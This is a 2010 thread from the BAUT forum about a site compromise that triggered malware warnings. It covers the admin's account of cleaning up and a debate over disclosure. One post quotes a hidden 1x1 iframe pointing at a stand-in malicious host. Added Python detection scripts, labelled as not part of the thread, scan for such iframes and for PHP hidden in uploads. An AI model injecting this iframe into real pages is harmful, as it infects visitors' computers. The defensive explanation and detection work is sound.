What is the current listing status for bautforum.com?

Site is listed as suspicious - visiting this website may harm your computer.

What happened when Google visited this site?

Of the 98 pages that we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time that Google visited this site was on 2010-04-03, and suspicious content was never found on this site within the past 90 days.

This site was hosted on 2 network(s) including AS36351 (SOFTLAYER), AS33070 (RMH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, bautforum.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

* Return to the previous page.
* If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.

Updated 32 hours ago

It's essentially making the site unusable in Firefox, and I'm not switching to IE permanently or compromising my security settings in Firefox just to read BAUT. I'd recommend switching back to the temporary server until this is sorted out.

01101001
2010-Apr-04, 04:47 PM
Turned it off in Safari :: Preferences :: Security

It's no fun clicking "ignore warning" and "yes I'm sure" buttons for every single page displayed.

Check your own browser for methods of disabling the warning -- unless you believe the warning is valid.

ShadowSot
2010-Apr-04, 04:53 PM
Currently working fine under Google Chrome.

Veeger
2010-Apr-04, 05:21 PM
Works ok under Chrome, but Google is flagging it. "This site will harm your computer..."

peter eldergill
2010-Apr-04, 06:02 PM
Funny, it was working fine for me earlier today on Firefox but now it's not. I'm getting the same warnings as above.

Pete

Fraser
2010-Apr-04, 06:32 PM
The thing that was generating the virus warnings is gone. I'm not sure what it's going to take to convince every virus scanner that everything's fine again, since they're clearly not checking in real time.

I'm guessing we just need to wait.

TampaDude
2010-Apr-04, 06:36 PM
Yeah, I just sent feedback to the Admins...twice, actually, because the first try got blocked...I'm still getting the messages and have turned off blocking for now.

DrRocket
2010-Apr-04, 06:37 PM
The thing that was generating the virus warnings is gone. I'm not sure what it's going to take to convince every virus scanner that everything's fine again, since they're clearly not checking in real time.

I'm guessing we just need to wait.

My several sentinels do not report any problems. But Google does. Apparently you, as owner of the forum can request a review of the site to eliminate this warning on Google. http://www.google.com/interstitial?url=http://www.bautforum.com/

Glom
2010-Apr-04, 06:48 PM
Chrome blocked the site. I had to override just to get here. I checked the Safe Browsing (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.bautforum.com/&client=googlechrome&hl=en-GB), which said actually nothing was wrong apart from the fact the domain was on the evil list. Norton hasn't flagged anything up though, which is a bit like not smelling hydrogen sulphide. Either there's no hydrogen sulphide or you have two minutes to live.

Glom
2010-Apr-04, 06:51 PM
I'm getting it on Chrome, though once I'm in, I can move around freely.

Fraser
2010-Apr-04, 07:23 PM
Okay great, I've submitted to Google for them to review it.

chrissy
2010-Apr-04, 07:50 PM
So far I am working fine here. Avast hasn't picked anything up, last night I had all popups blocked when clicking on a link from anyone though, I haven't tried it today.

kleindoofy
2010-Apr-04, 08:44 PM
Okay great, I've submitted to Google for them to review it.
Isn't it great to have the reputation of your site subject to the whims of some PFY at Google?

There's good and bad in everything.

Fraser
2010-Apr-04, 09:12 PM
It's things like Avast which are checking the site in real time which are very useful in this situation. So if that warning pops up again, please let me know.

clint
2010-Apr-04, 09:31 PM
Well, it's a sad thing to say, but there is always IE to view the forum...

With Chrome I can surf around the forum, but get the warning when I try to submit a post...
(also when trying to add a smiley)

HenrikOlsen
2010-Apr-04, 09:40 PM
Of the 107 pages we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-04, and the last time suspicious content was found on this site was on 2010-04-04.
Malicious software includes 2 trojan(s). Successful infection resulted in an average of 3 new process(es) on the target machine.

Malicious software is hosted on 1 domain(s), including cz.cc/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including buert.net/.

This site was hosted on 2 network(s) including AS36351 (SOFTLAYER), AS33070 (RMH).

Looks like you should have another look at what got copied over from the old site:(

publius
2010-Apr-04, 10:09 PM
I'm getting no warnings here at all. I just installed the latest version of Firefox after reading this thread, and it doesn't give any warnings here. Norton hasn't complained at all since the move.

-Richard

Jeff Root
2010-Apr-04, 10:14 PM
I got the same message from Firefox when I tried to get on three or four hours ago.
There was no problem getting the main page. The first thing I did was click on the
"Settings" button to view the list of subscribed threads with new posts, and the
message window came up. Clicking on the tiny little "Ignore" link brought up a
largish pop-up window. I forget what message it had. Underneath it was what
appeared to be either the BAUT main page or my settings page, but completely
without graphics or formatting of any kind, so I would have had to scroll down and
read it carefully to identify which page it was. I gave up instead.

Did anyone else get that second pop-up window? What was it?

Currently using IE 5.5 under Windows 98 SE!

-- Jeff, in Minneapolis

publius
2010-Apr-04, 10:16 PM
Whoops. Spoke too soon. It must take a while for the security stuff to "propagate" somehow with a new installation. The second time I fired up Firefox and loaded BAUT, it popped up the "attack site!" warning. :)

-Richard

Rhaedas
2010-Apr-04, 10:20 PM
It's too bad there's not an exemptions button next to the Report Attack Site in the Options, like there is one for the Addons just above it. That way when you first click on the "This isn't an attack site" on the red warning at the top, it would let you take the domain off your personal list.

Since it's not a threat, going back to IE isn't a problem directly, if you just use it for BAUT, but it's a bit like turning the firewall off, or taking a warning light out, or sticking the penny in the old fuse box. You can use IE...I won't touch the thing. :p

Jeff Root
2010-Apr-04, 11:11 PM
Since Richard reported that the warning is still coming up, I disconnected and
moved the phone cord back over to the other modem in the other computer,
with FireFox, to test it again.

What I remembered as a second pop-up window was just the window I got
when I clicked on the link in the red area above the BAUT page, saying "This
isn't an attack site", thinking that it would then be treated normally. What I
got was a page at stopbadware.org. I closed that. The BAUT page was the
BAUT main page, and it did have the graphics, after all, and the fonts, but
no layout of any kind, and no colors -- which was nice compared to the
current colors....

I then cleared the history, cookies, cache, and everything from inside FoxFire,
and rebooted. The icon beside my entry for BAUT in favorites had reverted
from the red exclamation mark to the vBulletin logo... which should have made
me think, but I missed the implication, which I'll get to in just a moment.
Going to BAUT again gave the warning message. It said that BAUT was last
checked "13 hours ago".

The implication of the vBulletin icon in my Favorites list was what I next found,
that the drop-down list under History still had all the websites I had visited.
Was the history really cleared? Doesn't look like it. Were cookies really cleared?
I either failed to notice or don't remember if BAUT recognized me when I called
back after telling FoxFire to clear everything. I'll have to try again....

-- Jeff, in Minneapolis

Jeff Root
2010-Apr-04, 11:24 PM
Okay, there was a reason FireFox didn't clear the History and cookies.
There is a dropdown selection box that I didn't notice, "Time range to clear",
which has a default of "Last Hour". I changed that to "Everything", which
appears to have done what I thought I did the first time.

-- Jeff, in Minneapolis

DrRocket
2010-Apr-05, 12:38 AM
I'm running IE8 and get no warnings.

I also get no warnings and find nothing with sweeps with McAfee, Spysweeper, Windows Defender, or AdAware.

But if I search for BAUT on Google and then try to enter from there I get a warning.

It seems to me that this indicates that the site is clean, and Google is behind the times.

publius
2010-Apr-05, 01:42 AM
I'm running IE8 and get no warnings.



Firefox uses some online database -- Google's I think -- of bad sites, and IE doesn't.

I booted my install of Fedora 12 Linux, which uses Firefox, and sure enough, the warning came up there as well. And Firefox must indeed go into some sort of lockdown mode when you click to go to the site anyway, as none of the graphics come up at all.

-Richard

Grashtel
2010-Apr-05, 02:13 AM
Isn't it great to have the reputation of your site subject to the whims of some PFY at Google?

There's good and bad in everything.
Most likely not even a PFY, just a computer that does the job automagically.

TheHalcyonYear
2010-Apr-05, 05:31 AM
The problem is being caused by JS:Prontexi (http://www.njnnetwork.com/njn/2010/03/new-facebook-and-advertising-virus-threats/#more-35477) which targets Windows machines and appears to set off all sorts of bogus alarms in the anti-virus software. It looks like it infects the sites through the ads and does not require a user to even mouse click to be infected.

Jeff Root
2010-Apr-05, 05:42 AM
If Google is the entity claiming that BAUT is BAD and Google is also the
entity which provided the AD that infected BAUT....

-- Jeff, in Minneapolis

TheHalcyonYear
2010-Apr-05, 06:36 AM
If Google is the entity claiming that BAUT is BAD and Google is also the
entity which provided the AD that infected BAUT....

-- Jeff, in Minneapolis
Yeah, it's gunna make this a bit weird before it's all straightened out. It does look, though, like this virus may not be very harmful; just a lotta bogus warnings from AV software. What worries me is that the payload could be a lot more destructive the next time someone launches one of these.


Edit to Add:

Though, I gotta add: If I was Fraser, I'd be having a nice long talk with Google right about now; getting people out of bed if need be.

PraedSt
2010-Apr-05, 07:10 AM
I've stopped getting the warnings.

TheHalcyonYear
2010-Apr-05, 07:16 AM
Me too. As of about an hour ago, everything seems back to normal. I think Fraser got things straightened out. What does one then say to someone who infects your site then tells everyone to stay away because your site is infected??

Oh to be a fly on the wall; a ghost in the back of the room.

JohnD
2010-Apr-05, 11:25 AM
The problem is being caused by JS:Prontexi (http://www.njnnetwork.com/njn/2010/03/new-facebook-and-advertising-virus-threats/#more-35477) which targets Windows machines and appears to set off all sorts of bogus alarms in the anti-virus software. It looks like it infects the sites through the ads and does not require a user to even mouse click to be infected.

Must be an echo in here. See post 90.
John

TheHalcyonYear
2010-Apr-05, 04:31 PM
Must be an echo in here. See post 90.
John
Thanks but no thanks.

Argos
2010-Apr-05, 05:48 PM
When I visited today I got a Firefox red warning page saying that it was a reported attack site. I chose to ignore the warning, but I'm wondering if we're still having security issues?
EDIT:
So basically, we're not being hacked or anything, yet Google's listing us as suspicious? How does that work out?

It's just an IFRAME exploit. A low tech, script kiddies kind of thing. Not a concern for those who can disable redirecting. Typically, all index files in the filesystem are appended with a couple of lines. In order to get rid of it, all index pages in all directories must be replaced by clean ones. It's a result of a weak/stolen FTP password.

chrissy
2010-Apr-05, 05:59 PM
It's things like Avast which are checking the site in real time which are very useful in this situation. So if that warning pops up again, please let me know.

Not a problem at all.

slang
2010-Apr-05, 06:50 PM
It's a result of a weak/stolen FTP password.

It can be. There are many other ways to corrupt a system, automated or not. I have not seen any indication that bad passwords played a role on this occasion.

IMHO this isn't the place to speculate. Address possible security concerns to Fraser directly, or to one of the admins.

Swift
2010-Apr-05, 06:57 PM
It can be. There are many other ways to corrupt a system, automated or not. I have not seen any indication that bad passwords played a role on this occasion, and IMHO this isn't the place to speculate. Address possible security concerns to Fraser directly, or to one of the admins.
Speculate all you like. Just don't expect confirmations on any of the speculations. ;)

Argos
2010-Apr-05, 07:05 PM
It can be. There are many other ways to corrupt a system, automated or not. I have not seen any indication that bad passwords played a role on this occasion, and IMHO this isn't the place to speculate. Address possible security concerns to Fraser directly, or to one of the admins.

I'm not a speculator. I'm an engineer. Don't use this tone to refer to me, as I've never used disrespect when talking to you.

Swift
2010-Apr-05, 07:11 PM
Chill everyone. I detected no disrespect, and even if there was, "eye-for-an-eye" comments will leave everyone blind (or at least infracted).

Argos
2010-Apr-05, 07:33 PM
No strong feelings here. Discussing security openly is the best way to deal with problems. It can help people [and I mean the general public that frequent here] avoid committing the same mistakes over and over again. It is positive to the Internet environment. I don't think my opinion has compromised BAUT's security in any way.

Siguy
2010-Apr-05, 07:55 PM
Has it cleared up? I'm no longer getting warning messages.

Argos
2010-Apr-05, 08:04 PM
Yes, apparently. As I said previously, IFRAME attacks compromise all index pages in the server's file system. All of them must be cleaned up. Apparently Fraser's done that.

Fraser
2010-Apr-05, 09:34 PM
I'm not sure what the original exploit was, but I think it was either some kind of SQL injection into an insecure part of the site (or a cross-side server attack), which changed one of the administrator email addresses. From there the exploiter was able to change the password, and then put code into the templates. They also somehow loaded PHP files into various directories. It's also possible that the hacker cracked one of the administrator passwords, revised a template and used that to bootstrap in their code.

My fix was set up a brand new server on Rackspace (a much more secure environment that prevents SSH), and then install the forum from scratch from non-compromised files that I downloaded directly from vBulletin. I also changed all the administrator passwords to very secure passwords. I also reverted the templates to their default settings, which is why we don't have the Google search, advertisements, etc. Once everything was working, I uploaded all the image files to make the attachments and avatars work.

I didn't realize that there were some hacker code files in some of those attachment directories, so the hacker (bot?) was able to bootstrap in and hack our templates again. That was the hack that we saw yesterday.

I wiped out all the hacker files, changed the admin passwords again, and now we're waiting for Google, etc to remove the virus warnings.

Jeff Root
2010-Apr-05, 09:34 PM
It's just an IFRAME exploit. A low tech, script kiddies kind of thing.
Not a concern for those who can disable redirecting. Typically, all
index files in the filesystem are appended with a couple of lines.
In order to get rid of it, all index pages in all directories must be
replaced by clean ones. It's a result of a weak/stolen FTP password.
I understand almost none of that.

I see that IFRAME is an HTML tag which displays one web page
inside another. The tag specifies the page to be imported.
How does a script exploit this?

You imply that the exploit replaces the content of the IFRAME tag so
that it links to a page other than the one it should link to, and that
this is "redirecting". How does a user or the user's software become
aware that a link is redirected in order to prevent that redirection?

What is an "index file" in this context? Is it what NTFS or FAT uses
to locate files on a hard drive? (I'm more familiar with FAT.) If so,
how does the exploit get write access to them?

What sort of "lines" would be appended to those files?

Is replacing altered "index pages" a matter of removing the appended
lines, or of replacing them from backups, or what?

Whose password is stolen? Where is it stolen from? Who or what
steals it? Where is the stolen password used? It isn't apparent
what a stolen password has to do with the IFRAME redirection or
lines appended to index files.

-- Jeff, in Minneapolis

Fraser
2010-Apr-05, 09:42 PM
Whose password is stolen? Where is it stolen from? Who or what
steals it? Where is the stolen password used? It isn't apparent
what a stolen password has to do with the IFRAME redirection or
lines appended to index files.

-- Jeff, in Minneapolis

One of the administrator passwords was stolen. Not really stolen, but changed, so that the hacker could pretend to be an administrator and update the website templates. Installing the IFRAME was the prize, like breaking into a bank to steal money. Once the IFRAME was on the site, it could be used to install Trojan viruses on visitors to BAUT who are using old, insecure computers and browsers.

slang
2010-Apr-05, 10:20 PM
I'm not a speculator. I'm an engineer. Don't use this tone to refer to me, as I've never used disrespect when talking to you.

I'm not sure what tone you mean, there was certainly no disrespect intended. I do see that I should have made clear which part of my response was to you, and which part was more in general (and I edited my post accordingly). In your response I took exception to what (perhaps wrongly) seemed to me an insinuation that an easily guessed or stolen FTP password was the cause of all this, implicitly blaming site owners, while there was (to my knowledge) no evidence of that, and plenty other possible attack vectors.


No strong feelings here. Discussing security openly is the best way to deal with problems. It can help people [and I mean the general public that frequent here] avoid committing the same mistakes over and over again. It is positive to the Internet environment.

Nor here, just bad communication on my part. Past mistakes, yes. I meant current, actual security issues. Openness is great, but if something seems wrong or dangerous, one should give admins a chance to fix before publishing. IMHO it just wouldn't do to post here something like "hey, if you use exploit X at website Y, and do Z, you can gain file or db access here". That should be something communicated more privately.


I don't think my opinion has compromised BAUT's security in any way.

Nor do I, and I apologize for wrongly giving the impression that I might think that.

Argos
2010-Apr-05, 10:27 PM
I understand almost none of that.

I see that IFRAME is an HTML tag which displays one web page
inside another. The tag specifies the page to be imported.
How does a script exploit this?

You imply that the exploit replaces the content of the IFRAME tag so
that it links to a page other than the one it should link to, and that
this is "redirecting".

Jeff, you seem to have a pretty good understanding. You're right.


How does a user or the user's software become
aware that a link is redirected in order to prevent that redirection?

A malicious IFRAME is only 1 pixel square. Most anti-viruses trigger an alarm when the IFRAME attempts downloading the threat.


What is an "index file" in this context? Is it what NTFS or FAT uses
to locate files on a hard drive?

Index files, in this context, are the main files on web server directories [or file system, or directory tree]. Generally there are index.html files in all folders of a domain's file system, and the index file in the domain's root gives you access to a website. Developers use empty index.html files in directories other than root to prevent directory browsing. The contents of a directory - or folder - would be visible if those empty files are not provided.


If so, how does the exploit get write access to them?

As explained by Fraser.


What sort of "lines" would be appended to those files?

The IFRAME lines. Like these:
<iframe src ="evildomain.ru" width="1" height="1">
<p>Your browser does not support iframes.</p>
</iframe>


Is replacing altered "index pages" a matter of removing the appended
lines, or of replacing them from backups, or what?

Replacing from backups is always better/easier, like Fraser did.

I think Fraser already addressed the rest.
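
The injection Argos describes above, as an added detection example that is not code from this thread or from vBulletin: a Python scan that walks a web root, reads every index file and reports iframes that are hidden (1x1, 0x0 or display:none) and point at a host outside the site's own domain. The site domain `bautforum.com`, the directory layout and the sample pages (including an appended tail modelled on the snippet quoted above) are constructed for the example.

```python
"""Scan a web root for index pages carrying an injected hidden iframe.

Hypothetical detection helper (not code from the forum thread): walks a
directory tree, reads every index.html / index.htm / index.php and reports
<iframe> tags that are hidden (1x1, 0x0 or display:none) and whose src
points at a host outside the site's own domain. The sample web root is
constructed inline so the scan runs offline.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

INDEX_NAMES = {"index.html", "index.htm", "index.php"}

# Opening <iframe ...> tag; group 1 is the raw attribute text.
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value", name='value' or name=value pairs inside a tag.
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(attr_text):
    attrs = {}
    for m in ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = (m.group(2) or m.group(3) or m.group(4) or "").strip()
    return attrs


def src_host(src):
    """Hostname an iframe src points at; '' for a site-relative path."""
    if "://" in src or src.startswith("//"):
        return (urlparse(src if "://" in src else "http:" + src).hostname or "").lower()
    # Bare 'evildomain.ru' without a scheme: treat a dotted first segment as a host.
    first = src.split("/")[0]
    return first.lower() if "." in first else ""


def is_hidden(attrs):
    width, height = attrs.get("width", ""), attrs.get("height", "")
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((width in ("0", "1") and height in ("0", "1"))
            or "display:none" in style or "visibility:hidden" in style)


def suspicious_iframes(html, site_domain):
    """Hidden iframes whose src host is outside site_domain (and its subdomains)."""
    findings = []
    for m in IFRAME_TAG.finditer(html):
        attrs = parse_attrs(m.group(1))
        host = src_host(attrs.get("src", ""))
        external = host and host != site_domain and not host.endswith("." + site_domain)
        if external and is_hidden(attrs):
            findings.append({"src": attrs.get("src", ""), "host": host})
    return findings


def scan_webroot(root, site_domain):
    """Map relative path -> findings for every index file with a hidden external iframe."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in INDEX_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                hits = suspicious_iframes(f.read(), site_domain)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed sample pages: a legitimate same-site banner iframe, and the
# appended 1x1 iframe modelled on the snippet quoted in the thread.
CLEAN_PAGE = ('<html><body><h1>BAUT</h1>'
              '<iframe src="/ads/banner.html" width="468" height="60"></iframe>'
              '</body></html>\n')
INJECTED_TAIL = ('<iframe src ="evildomain.ru" width="1" height="1">\n'
                 '<p>Your browser does not support iframes.</p>\n</iframe>\n')


def build_sample_webroot():
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "images"))
    os.makedirs(os.path.join(root, "forum"))
    files = {
        "index.html": CLEAN_PAGE + INJECTED_TAIL,   # main page, injected
        "images/index.html": INJECTED_TAIL,         # empty anti-listing page, injected
        "forum/index.php": CLEAN_PAGE,              # untouched
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for path, hits in sorted(scan_webroot(root, "bautforum.com").items()):
        for hit in hits:
            print(f"{path}: hidden iframe to {hit['host']} (src={hit['src']!r})")
```

The check keys on two properties together, hidden geometry and an off-site host, because either one alone is common on a legitimate page (ad banners are external but visible; same-site iframes may be tiny). Run it against a copy of the tree, not the live root, and treat every hit as a file to restore from a known-good backup rather than edit in place.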

TheHalcyonYear
2010-Apr-05, 10:28 PM
Nor here, just bad communication on my part. Past mistakes, yes. I meant current, actual security issues. Openness is great, but if something seems wrong or dangerous, one should give admins a chance to fix before publishing. IMHO it just wouldn't do to post here something like "hey, if you use exploit X at website Y, and do Z, you can gain file or db access here". That should be something communicated more privately.

I disagree with this. I think open discussion of these issues is important. I think that it was even more in this case since there was the danger that posters' systems had been infected. I have concern for the admins and their problems, but I also think that full disclosure as quickly and completely as possible is the best way.

Argos
2010-Apr-05, 10:29 PM
Nor do I, and I apologize for wrongly giving the impression that I might think that.

OK. NO problem at all. Let's forget the misinterpretation. Still friends? :)

slang
2010-Apr-05, 10:40 PM
I disagree with this. I think open discussion of these issues is important. I think that it was even more in this case since there was the danger that posters' systems had been infected. I have concern for the admins and their problems, but I also think that full disclosure as quickly and completely as possible is the best way.

Only to the point of where the information helps posters or site visitors. Knowing exactly how a website might be, or has been, corrupted, is of no immediate help to visitors of that site. What was subsequently done to (attempt to) infect others is something else. These are two very different things, with different consequences, and different approaches to best results.


OK. NO problem at all. Let's forget the misinterpretation. Still friends? :)

*throws a cold beer* (If you don't drink, trade it for something better)

HenrikOlsen
2010-Apr-05, 10:45 PM
I'm not a speculator. I'm an engineer. Don't use this tone to refer to me, as I've never used disrespect when talking to you.
You did speculate (and to some extent disrespect) when you made the supposition of a weak password.

Reading between the lines of Fraser's posts it looks rather like it was a weakness in the vBulletin code that was exploited to alter the files, this was one of the reasons for rushing the update.

HenrikOlsen
2010-Apr-05, 10:55 PM
Nor here, just bad communication on my part. Past mistakes, yes. I meant current, actual security issues. Openness is great, but if something seems wrong or dangerous, one should give admins a chance to fix before publishing. IMHO it just wouldn't do to post here something like "hey, if you use exploit X at website Y, and do Z, you can gain file or db access here". That should be something communicated more privately.
I disagree with this. I think open discussion of these issues is important. I think that it was even more in this case since there was the danger that posters' systems had been infected. I have concern for the admins and their problems, but I also think that full disclosure as quickly and completely as possible is the best way.
There are both good and bad ways of doing full disclosure, and in my many years as programmer and sysadmin I've seen most of them.

For instance, when a weakness in a program has been found that allows people to abuse it, there are several ways to react:
A good way is to describe the weakness in vague terms and a quick fix/workaround in precise terms, and provide details of the exploit specifically to those developing the software for patching, as that gives the required information to the right people and more importantly doesn't give too much info to the blackhats.
A very bad way is to publish a detailed exploit, and go "Now they will have to fix it."
For some reason it's the latter who tends to defend their action as full disclosure and I have seen examples of that behavior.

Another way to express this is: Are you going to pay for the work wasted because someone posted an exploit Saturday and gave the script kiddies 2 days to destroy things before the admins got to work Monday and had a chance to read security bulletins?
Since you're demanding full disclosure, you should be willing to take responsibility for the consequences of your demand.

In this case we've had "full enough" disclosure.
Someone managed to get access (how is irrelevant for the members) to alter the files on the server so some of the pages made the users' browsers try to fetch malware.
Which malware is difficult to say, as different antivirus programs use different names for them and since it's fetched from another site and may even be rotating between multiple types it can't be reliably recorded and reported.

What more do you want to know?

Argos
2010-Apr-05, 11:02 PM
A good way is to describe the weakness in vague terms and a quick fix/workaround in precise terms, and provide details of the exploit specifically to those developing the software for patching, as that gives the required information to the right people and more importantly doesn't give too much info to the blackhats.

I doubt a real blackhat can learn something here that he doesn't already know...

slang
2010-Apr-05, 11:14 PM
I doubt a real blackhat can learn something here that he doesn't already know...

Perhaps not, but the grey hats.. they'll pounce on any opportunity to cause mayhem. Fear the greys (a little)!

HenrikOlsen
2010-Apr-05, 11:21 PM
I doubt a real blackhat can learn something here that he doesn't already know...
So do I. I was really responding to THY's demand for "full disclosure" in a reply to a description of someone posting an exploit. I've edited my post to include the quote THY was responding to, to make that clearer.

A too detailed explanation of how our files got altered might however tell a script kiddie enough to attack another site still using the previous version of vBulletin.

Jeff Root
2010-Apr-05, 11:51 PM
That looked like a pretty good explanation of what happened.

For anyone using a susceptible browser, if the exploit had remained in place
undetected, what would have happened on their computer?

(I've had scripting turned off *most* of the time for the last two or three months
just to avoid the ads here on BAUT. For a short time I mistakenly thought disabling
Active X and disabling cookies from the advertising websites would be enough,
but apparently I turned off scripting at the same time I made the other changes,
and it was what did the job.)

-- Jeff, in Minneapolis

TheHalcyonYear
2010-Apr-06, 02:00 AM
So do I. I was really responding to THY's demand for "full disclosure" in a reply to a description of someone posting an exploit. I've edited my post to include the quote THY was responding to, to make that clearer.

A too detailed explanation of how our files got altered might however tell a script kiddie enough to attack another site still using the previous version of vBulletin.
I'm not asking administrators to reveal anything about how the site or servers are structured. I am suggesting that whatever posters might find out should not be suppressed. It's like saying that the information about making a bomb should be suppressed. Anything I might post is almost certainly in the hands of a bomb-maker.

mugaliens
2010-Apr-06, 02:09 AM
I'm not asking administrators to reveal anything about how the site or servers are structured. I am suggesting that whatever posters might find out should not be suppressed. It's like saying that the information about making a bomb should be suppressed. Anything I might post is almost certainly in the hands of a bomb-maker.

This is undoubtedly true for an experienced bomb-maker, but it's not true for those just getting into it. Bomb-making techniques are not commonly in the hands of a juvenile delinquent who would otherwise be unable to hurt himself or others with a bomb that perhaps goes off prematurely or during manufacture.

I concur with Henrik's detailed assessment and approach (http://www.bautforum.com/showthread.php/102548-Forum-access-and-security-problems-2010?p=1712303#post1712303) he provides in post #152.

TheHalcyonYear
2010-Apr-06, 02:33 AM
This is undoubtedly true for an experienced bomb-maker, but it's not true for those just getting into it. Bomb-making techniques are not commonly in the hands of a juvenile delinquent who would otherwise be unable to hurt himself or others with a bomb that perhaps goes off prematurely or during manufacture.

I concur with Henrik's detailed assessment and approach (http://www.bautforum.com/showthread.php/102548-Forum-access-and-security-problems-2010?p=1712303#post1712303) he provides in post #152.
Good for you, I obviously disagree.

Fraser
2010-Apr-06, 02:48 AM
I'm happy to yack on and on about it, I don't really mind if you want all the gory details. But there isn't much more I really know. Performing security forensics is one of the most highly skilled tasks a system administrator can do.

How did the hacker get in? I don't honestly know. I didn't leave a careful crime scene for further analysis. I assumed that the hacker took one of the common attack vectors that hackers always take. And then I nuked the site from orbit.

1. They could have hacked an admin password. So we changed all the admin passwords and made sure they're ridiculously long with bizarre characters in them.
2. They might have exploited a weakness in the server or operating system, or used a different website on the server to make an attack. I set up a brand new server in a much more secure server environment; one which doesn't even give me root access or SSH (you admins know how much of a sacrifice that is).
3. They might have exploited an insecure part of vBulletin. I installed a completely fresh version of vBulletin 4, which is likely to have all the latest security upgrades. I also installed it fresh onto a new server.

My mistake when copying over the image files (so we can see our custom avatars, and attachments) was to include one of the hacker's scripts, which could then be used to attack the server again. But I've cleaned that up.
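
The mistake Fraser describes in the last paragraph, copying an uploads tree that still held one of the attacker's scripts, as an added example that is not the forum's or vBulletin's own code: a Python audit run over an attachment/avatar tree before it is restored onto a rebuilt server. It checks each file's extension against its magic bytes, rejects server-side script extensions outright, and flags any file, image or not, that contains a PHP open tag. The directory names, the sample files and the placeholder PHP content are constructed for the example.

```python
"""Audit an uploads tree (attachments, avatars) before restoring it onto a
rebuilt server.

Hypothetical helper, not the forum's or vBulletin's own code. For every file
it checks that the extension matches the file's magic bytes, rejects
server-side script extensions, and flags any content containing a PHP open
tag (which catches image/PHP polyglots whose magic bytes look fine). The
sample tree below is constructed inline so the audit runs offline.
"""
import os
import tempfile

# Magic bytes for the image types an uploads tree is expected to contain.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
SCRIPT_EXTENSIONS = {".php", ".php3", ".php5", ".phtml", ".cgi", ".pl", ".sh"}
PHP_TAGS = (b"<?php", b"<?=", b'<script language="php"')


def audit_file(path):
    """Return the reasons this file should not be restored (empty list = ok)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as f:
        data = f.read()
    if ext in SCRIPT_EXTENSIONS:
        reasons.append("server-side script extension")
    elif ext in MAGIC:
        if not data.startswith(MAGIC[ext]):
            reasons.append("content does not match %s magic bytes" % ext)
    else:
        reasons.append("unexpected extension %r" % ext)
    # Check the content regardless of extension: a valid GIF header followed
    # by PHP is still executable if the server ever runs it as PHP.
    low = data.lower()
    if any(tag in low for tag in PHP_TAGS):
        reasons.append("contains a PHP open tag")
    return reasons


def audit_tree(root):
    """Map relative path -> reasons for every file that fails the audit."""
    bad = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = audit_file(path)
            if reasons:
                bad[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return bad


def build_sample_uploads():
    """Constructed uploads tree: two genuine images and three files to reject."""
    root = tempfile.mkdtemp(prefix="uploads_")
    os.makedirs(os.path.join(root, "avatars"))
    os.makedirs(os.path.join(root, "attachments"))
    samples = {
        "avatars/avatar1.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,   # real PNG header
        "attachments/photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,  # real JPEG header
        "avatars/helper.php": b"<?php /* constructed placeholder script */ ?>",
        "attachments/banner.gif": b"GIF89a" + b"<?php /* constructed polyglot */ ?>",
        "attachments/notes.txt": b"just text",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_uploads()
    for rel, reasons in sorted(audit_tree(root).items()):
        print("REJECT %s: %s" % (rel, "; ".join(reasons)))
```

The point of checking content independently of the extension is the polyglot case: a file that passes a "is this a GIF?" test can still carry PHP, and whether it ever executes depends on the web server's handler configuration on the new host, which is exactly what a restore should not have to trust. Files the audit rejects are quarantined for inspection, not silently dropped, so a false positive costs a look rather than a lost attachment.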

TheHalcyonYear
2010-Apr-06, 04:52 AM
Thanks Fraser,

Your honesty is much appreciated.

THY

slang
2010-Apr-06, 07:36 AM
one which doesn't even give me root access or SSH (you admins know how much of a sacrifice that is).

The term "masochist" comes to mind :) But it does explain why some other stuff takes more time to fix than hoped for.

Jeff Root
2010-Apr-06, 11:14 AM
My mistake when copying over the image files (so we can see our
custom avatars, and attachments) was to include one of the hacker's
scripts, which could then be used to attack the server again.
I take it that you identified the script.

Is there any idea when the system was first attacked? I'm interested in
getting a CD or DVD from you of the system as it was before the attack,
although I presume that I'd have to buy the vBulletin software to view it,
which might be cost prohibitive. I gather that it is commercial software.
I wonder if they sell licenses for individual use....

-- Jeff, in Minneapolis

ToSeek
2010-Apr-06, 09:39 PM
I'm happy to yack on and on about it, I don't really mind if you want all the gory details. But there isn't much more I really know. Performing security forensics is one of the most highly skilled tasks a system administrator can do.

